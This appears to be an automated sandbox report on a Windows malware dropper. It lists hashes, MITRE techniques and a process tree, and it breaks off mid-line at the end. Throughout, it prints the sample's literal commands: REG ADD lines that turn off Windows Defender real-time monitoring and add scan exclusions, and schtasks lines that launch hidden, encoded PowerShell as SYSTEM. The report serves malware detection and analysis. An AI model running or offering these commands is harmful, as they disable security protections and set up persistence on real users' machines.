06f235cc1f8031948ab22f7cc7ba2c1e727a4c93bf65ae3ee63b90affe2306ea

Analysis

max time kernel
151s
max time network
139s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
02/11/2022, 23:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

819421783b9a637ad85eb4645e5bf3f0
SHA1

66feb1eec5d150d58640629256bfebc543355af9
SHA256

06f235cc1f8031948ab22f7cc7ba2c1e727a4c93bf65ae3ee63b90affe2306ea
SHA512

460bb83227e4b5e82ba04f525e08365519fabf70ee40f422913383f8637a0746b4254a479d127e5860cdb94c14dd3f7795d8cec683dbd94cca39f9dfb1cd3e44
SSDEEP

196608:91O3T48n2Ty/wM7rS/Jh0p+8OiaZ/9QWEbEAvuYA0eh6gEC:3OE02Tyx6/Jh0M/7ZFQWcEY/eYgEC

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fgVwMTqiU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LIlFJKOGralwUzVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RncPYqRQHvaZC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fgVwMTqiU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EEhevTZkvedctBgP = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VYWxesdDCpjpSebGIXR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LIlFJKOGralwUzVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RncPYqRQHvaZC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VYWxesdDCpjpSebGIXR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EEhevTZkvedctBgP = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EEhevTZkvedctBgP = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VQFyxEHfdwmU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mvOpedjiwEUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mvOpedjiwEUn = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\cHTSpkNZKPNalDphj = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\cHTSpkNZKPNalDphj = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VQFyxEHfdwmU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EEhevTZkvedctBgP = "0"	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1708	Install.exe
1200	Install.exe
596	bZNaLKn.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1976	file.exe
1708	Install.exe
1708	Install.exe
1708	Install.exe
1708	Install.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	bZNaLKn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bZNaLKn.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bZNaLKn.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bFdVQfbCkuaogSytVh.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1316	schtasks.exe
1468	schtasks.exe
576	schtasks.exe
1280	schtasks.exe
576	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1392	powershell.EXE
1392	powershell.EXE
1392	powershell.EXE
320	powershell.EXE
320	powershell.EXE
320	powershell.EXE
1432	powershell.EXE
1432	powershell.EXE
1432	powershell.EXE
2020	powershell.EXE
2020	powershell.EXE
2020	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1392	powershell.EXE
Token: SeDebugPrivilege	320	powershell.EXE
Token: SeDebugPrivilege	1432	powershell.EXE
Token: SeDebugPrivilege	2020	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1976 wrote to memory of 1708	1976	file.exe	26
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1708 wrote to memory of 1200	1708	Install.exe	27
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 1368	1200	Install.exe	29
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 1200 wrote to memory of 768	1200	Install.exe	31
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 768 wrote to memory of 1496	768	forfiles.exe	34
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1368 wrote to memory of 1520	1368	forfiles.exe	33
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1496 wrote to memory of 1280	1496	cmd.exe	35
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1520 wrote to memory of 804	1520	cmd.exe	36
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1496 wrote to memory of 1988	1496	cmd.exe	38
PID 1520 wrote to memory of 1692	1520	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Users\Admin\AppData\Local\Temp\7zS5793.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Users\Admin\AppData\Local\Temp\7zS646F.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1368
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1520
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:804
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1692
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:768
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1496
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1280
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1988
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gsJbjqPjL" /SC once /ST 00:01:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1468
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gsJbjqPjL"
      4⤵
      PID:1948
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gsJbjqPjL"
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bFdVQfbCkuaogSytVh" /SC once /ST 00:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\cHTSpkNZKPNalDphj\jnYiUvevgFIoSpO\bZNaLKn.exe\" Sk /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:576

C:\Windows\system32\taskeng.exe
taskeng.exe {F9F8E8E7-3C96-460A-A55C-127B69744A79} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:320
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:584

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1628

C:\Windows\system32\taskeng.exe
taskeng.exe {6E279864-CC9C-4AF5-8B59-1AE6FE9074C2} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1964
- C:\Users\Admin\AppData\Local\Temp\cHTSpkNZKPNalDphj\jnYiUvevgFIoSpO\bZNaLKn.exe
  C:\Users\Admin\AppData\Local\Temp\cHTSpkNZKPNalDphj\jnYiUvevgFIoSpO\bZNaLKn.exe Sk /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:596
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "guYecYGkV" /SC once /ST 00:06:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1280
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "guYecYGkV"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "guYecYGkV"
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1196
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1704
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1136
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gdDTOBrHf" /SC once /ST 00:06:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gdDTOBrHf"
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gdDTOBrHf"
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:808
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:112
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:860
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:320
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EEhevTZkvedctBgP" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\EEhevTZkvedctBgP\dLTWcOSu\ikJYLkDBLICkekYm.wsf"
    3⤵
    PID:628
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\EEhevTZkvedctBgP\dLTWcOSu\ikJYLkDBLICkekYm.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1840
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RncPYqRQHvaZC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1052
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RncPYqRQHvaZC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1116
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQFyxEHfdwmU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1312
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQFyxEHfdwmU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1060
  - - C:\Windows\SysWOW64\reg.exe
